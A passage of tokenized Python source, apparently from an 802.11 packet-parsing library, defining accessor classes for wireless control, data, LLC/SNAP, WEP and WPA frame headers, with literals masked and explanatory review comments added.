def set_subtype ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:0> ) & mask <EOL> nb = masked | ( ( value << <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> self . header . 
set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_type ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( ( b >> <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> def set_type ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:0> ) & mask <EOL> nb = masked | ( ( value << <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> # Combined type + subtype view of byte 0 , everything above the 2 version bits <EOL> def get_type_n_subtype ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( ( b >> <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> def set_type_n_subtype ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:0> ) & mask <EOL> nb = masked | ( ( value << <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_version ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_version ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:0> ) & mask <EOL> nb = masked | ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> # CRC32 of the payload , repacked via struct so the byte order flips -- NOTE : the bare L suffix below is a Python 2 long literal <EOL> def compute_checksum ( self , bytes ) : <EOL> crcle = crc32 ( bytes ) & <NUM_LIT> L <EOL> crc = struct . pack ( '<STR_LIT>' , crcle ) <EOL> ( crc_long , ) = struct . unpack ( '<STR_LIT>' , crc ) <EOL> return crc_long <EOL> # Predicates below test single bits of header byte 0 ; the "and True" coerces the mask result to a bool-ish value <EOL> def is_QoS_frame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) and True <EOL> def is_no_framebody_frame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) and True <EOL> def is_cf_poll_frame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . 
get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) and True <EOL> def is_cf_ack_frame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) and True <EOL> # FCS accessors : return None / no-op when the frame was built without an FCS tail <EOL> def get_fcs ( self ) : <EOL> "<STR_LIT>" <EOL> if not self . __FCS_at_end : <EOL> return None <EOL> b = self . tail . get_long ( - <NUM_LIT:4> , "<STR_LIT:>>" ) <EOL> return b <EOL> # NOTE ( review ) : the local name crc32 below shadows the module-level crc32 function inside this method <EOL> def set_fcs ( self , value = None ) : <EOL> "<STR_LIT>" <EOL> if not self . __FCS_at_end : <EOL> return <EOL> if value is None : <EOL> payload = self . get_body_as_string ( ) <EOL> crc32 = self . compute_checksum ( payload ) <EOL> value = crc32 <EOL> nb = value & <NUM_LIT> <EOL> self . tail . set_long ( - <NUM_LIT:4> , nb ) <EOL> # CTS control frame : little-endian duration word at offset 0 plus a 6-byte receiver address ( RA ) <EOL> class Dot11ControlFrameCTS ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:8> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> # ACK control frame : same duration + RA layout as CTS <EOL> class Dot11ControlFrameACK ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:8> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . 
header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> # RTS control frame : duration word , RA at bytes 2-7 and TA starting at byte 8 <EOL> class Dot11ControlFrameRTS ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_ta ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_ta ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> # PS-Poll control frame : AID word at offset 0 , BSSID at bytes 2-7 , TA from byte 8 <EOL> class Dot11ControlFramePSPoll ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . 
load_packet ( aBuffer ) <EOL> def get_aid ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_aid ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_bssid ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_bssid ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_ta ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_ta ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> # CF-End control frame : duration word , RA at bytes 2-7 , BSSID from byte 8 <EOL> class Dot11ControlFrameCFEnd ( ProtocolPacket ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> "<STR_LIT>" <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_bssid ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . 
get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_bssid ( self , value ) : <EOL> "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> # CF-End + CF-ACK control frame : same duration / RA / BSSID layout as CF-End <EOL> class Dot11ControlFrameCFEndCFACK ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_ra ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_ra ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> # NOTE ( review ) : get_bssid slices 8 bytes ( [ 8 : 16 ] ) while set_bssid writes only 6 -- looks inconsistent with the other control frames ; confirm <EOL> def get_bssid ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT:16> ] <EOL> def set_bssid ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> # Data frame : duration word , three 6-byte addresses , then sequence control at offset 20 <EOL> class Dot11DataFrame ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . 
set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> # Address 1 / 2 / 3 occupy header bytes 2-7 , 8-13 and 14-19 respectively <EOL> def get_address1 ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_address1 ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_address2 ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_address2 ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> def get_address3 ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT> : <NUM_LIT:20> ] <EOL> def set_address3 ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT> + i , value [ i ] ) <EOL> # Sequence Control is the little-endian word at header offset 20 ; fragment number in the low nibble , sequence number above it <EOL> def get_sequence_control ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_sequence_control ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_fragment_number ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_fragment_number ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) & mask <EOL> nb = masked | ( value & <NUM_LIT> ) <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_sequence_number ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . 
get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) <EOL> return ( ( b >> <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> def set_sequence_number ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:4> ) <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_frame_body ( self ) : <EOL> '<STR_LIT>' <EOL> return self . get_body_as_string ( ) <EOL> def set_frame_body ( self , data ) : <EOL> '<STR_LIT>' <EOL> self . load_body ( data ) <EOL> # QoS data frame : extends the data header with a trailing QoS word ; note __init__ calls ProtocolPacket directly rather than the parent class <EOL> class Dot11DataQoSFrame ( Dot11DataFrame ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_QoS ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_QoS ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT> , nb , "<STR_LIT:<>" ) <EOL> # Four-address data frame ( WDS ) : adds a fourth 6-byte address after the sequence control word <EOL> class Dot11DataAddr4Frame ( Dot11DataFrame ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_address4 ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT> : <NUM_LIT> ] <EOL> def set_address4 ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT> + i , value [ i ] ) <EOL> # Four-address QoS data frame : 30-byte header combining address 4 and the QoS word <EOL> class Dot11DataAddr4QoSFrame ( Dot11DataAddr4Frame ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:30> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . 
__init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_QoS ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_QoS ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT> , nb , "<STR_LIT:<>" ) <EOL> # SAPTypes : namespace of well-known LLC SAP constants ( numeric values are masked in this dump ) <EOL> class SAPTypes ( ) : <EOL> NULL = <NUM_LIT> <EOL> LLC_SLMGMT = <NUM_LIT> <EOL> SNA_PATHCTRL = <NUM_LIT> <EOL> IP = <NUM_LIT> <EOL> SNA1 = <NUM_LIT> <EOL> SNA2 = <NUM_LIT> <EOL> PROWAY_NM_INIT = <NUM_LIT> <EOL> NETWARE1 = <NUM_LIT> <EOL> OSINL1 = <NUM_LIT> <EOL> TI = <NUM_LIT> <EOL> OSINL2 = <NUM_LIT> <EOL> OSINL3 = <NUM_LIT> <EOL> SNA3 = <NUM_LIT> <EOL> BPDU = <NUM_LIT> <EOL> RS511 = <NUM_LIT> <EOL> OSINL4 = <NUM_LIT> <EOL> X25 = <NUM_LIT> <EOL> XNS = <NUM_LIT> <EOL> BACNET = <NUM_LIT> <EOL> NESTAR = <NUM_LIT> <EOL> PROWAY_ASLM = <NUM_LIT> <EOL> ARP = <NUM_LIT> <EOL> SNAP = <NUM_LIT> <EOL> HPJD = <NUM_LIT> <EOL> VINES1 = <NUM_LIT> <EOL> VINES2 = <NUM_LIT> <EOL> NETWARE2 = <NUM_LIT> <EOL> NETBIOS = <NUM_LIT> <EOL> IBMNM = <NUM_LIT> <EOL> HPEXT = <NUM_LIT> <EOL> UB = <NUM_LIT> <EOL> RPL = <NUM_LIT> <EOL> OSINL5 = <NUM_LIT> <EOL> GLOBAL = <NUM_LIT> <EOL> # LLC header : DSAP , SSAP and control , one byte each <EOL> class LLC ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> DLC_UNNUMBERED_FRAMES = <NUM_LIT> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:3> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_DSAP ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_byte ( <NUM_LIT:0> ) <EOL> def set_DSAP ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_byte ( <NUM_LIT:0> , value ) <EOL> def get_SSAP ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_byte ( <NUM_LIT:1> ) <EOL> def set_SSAP ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . 
set_byte ( <NUM_LIT:1> , value ) <EOL> def get_control ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_byte ( <NUM_LIT:2> ) <EOL> def set_control ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_byte ( <NUM_LIT:2> , value ) <EOL> # SNAP header : 3-byte OUI followed by a big-endian 2-byte protocol ID <EOL> class SNAP ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:5> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> # NOTE : tostring ( ) below is the Python 2 array API ( renamed tobytes ( ) in Python 3 ) ; the OUI is widened with a leading zero byte before unpacking <EOL> def get_OUI ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_bytes ( ) [ <NUM_LIT:0> : <NUM_LIT:3> ] . tostring ( ) <EOL> ( oui , ) = struct . unpack ( '<STR_LIT>' , '<STR_LIT:\x00>' + b ) <EOL> return oui <EOL> def set_OUI ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ( ~ <NUM_LIT> ) & <NUM_LIT> ) <EOL> masked = self . header . get_long ( <NUM_LIT:0> , "<STR_LIT:>>" ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:8> ) <EOL> self . header . set_long ( <NUM_LIT:0> , nb ) <EOL> def get_protoID ( self ) : <EOL> "<STR_LIT>" <EOL> return self . header . get_word ( <NUM_LIT:3> , "<STR_LIT:>>" ) <EOL> def set_protoID ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_word ( <NUM_LIT:3> , value , "<STR_LIT:>>" ) <EOL> # WEP header : 3-byte IV plus a key-id byte ; is_WEP tests a bit of header byte 3 <EOL> class Dot11WEP ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:4> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def is_WEP ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return not ( b & <NUM_LIT> ) <EOL> def get_iv ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_bytes ( ) [ <NUM_LIT:0> : <NUM_LIT:3> ] . tostring ( ) <EOL> ( iv , ) = struct . 
unpack ( '<STR_LIT>' , '<STR_LIT:\x00>' + b ) <EOL> return iv <EOL> def set_iv ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ( ~ <NUM_LIT> ) & <NUM_LIT> ) <EOL> masked = self . header . get_long ( <NUM_LIT:0> , "<STR_LIT:>>" ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:8> ) <EOL> self . header . set_long ( <NUM_LIT:0> , nb ) <EOL> def get_keyid ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:6> ) & <NUM_LIT> ) <EOL> def set_keyid ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:6> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> # RC4 decrypt using IV + key ; bodies shorter than the minimum are returned untouched <EOL> def get_decrypted_data ( self , key_string ) : <EOL> '<STR_LIT>' <EOL> if len ( self . body_string ) < <NUM_LIT:8> : <EOL> return self . body_string <EOL> iv = struct . pack ( '<STR_LIT>' , self . get_iv ( ) ) [ - <NUM_LIT:3> : ] <EOL> key = iv + key_string <EOL> rc4 = RC4 ( key ) <EOL> decrypted_data = rc4 . decrypt ( self . body_string ) <EOL> return decrypted_data <EOL> # RC4 is symmetric , so encryption simply reuses the decrypt path <EOL> def get_encrypted_data ( self , key_string ) : <EOL> return self . get_decrypted_data ( key_string ) <EOL> def encrypt_frame ( self , key_string ) : <EOL> enc = self . get_encrypted_data ( key_string ) <EOL> self . load_body ( enc ) <EOL> # WEP data : body followed by a 4-byte big-endian ICV tail <EOL> class Dot11WEPData ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:0> <EOL> tail_size = <NUM_LIT:4> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_icv ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . tail . get_long ( - <NUM_LIT:4> , "<STR_LIT:>>" ) <EOL> return b <EOL> def set_icv ( self , value = None ) : <EOL> "<STR_LIT>" <EOL> if value is None : <EOL> value = self . get_computed_icv ( ) <EOL> nb = value & <NUM_LIT> <EOL> self . tail . 
set_long ( - <NUM_LIT:4> , nb ) <EOL> # CRC32 of the body repacked to flip byte order -- the bare L suffix is a Python 2 long literal <EOL> def get_computed_icv ( self ) : <EOL> crcle = crc32 ( self . body_string ) & <NUM_LIT> L <EOL> crc = struct . pack ( '<STR_LIT>' , crcle ) <EOL> ( crc_long , ) = struct . unpack ( '<STR_LIT>' , crc ) <EOL> return crc_long <EOL> # True iff the stored ICV matches a CRC32 recomputed over the body <EOL> def check_icv ( self ) : <EOL> computed_icv = self . get_computed_icv ( ) <EOL> current_icv = self . get_icv ( ) <EOL> if computed_icv == current_icv : <EOL> return True <EOL> else : <EOL> return False <EOL> # WPA ( TKIP ) header : 8 bytes holding the TSC bytes , WEP seed , key id and extIV flag <EOL> class Dot11WPA ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:8> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> # Heuristic : the TKIP WEP seed is derived from TSC1 , and extIV must be set <EOL> def is_WPA ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . get_WEPSeed ( ) == ( ( self . get_TSC1 ( ) | <NUM_LIT> ) & <NUM_LIT> ) <EOL> return ( b and self . get_extIV ( ) ) <EOL> def get_keyid ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:6> ) & <NUM_LIT> ) <EOL> def set_keyid ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:6> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_decrypted_data ( self ) : <EOL> '<STR_LIT>' <EOL> return self . body_string <EOL> def get_TSC1 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC1 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_WEPSeed ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_WEPSeed ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . 
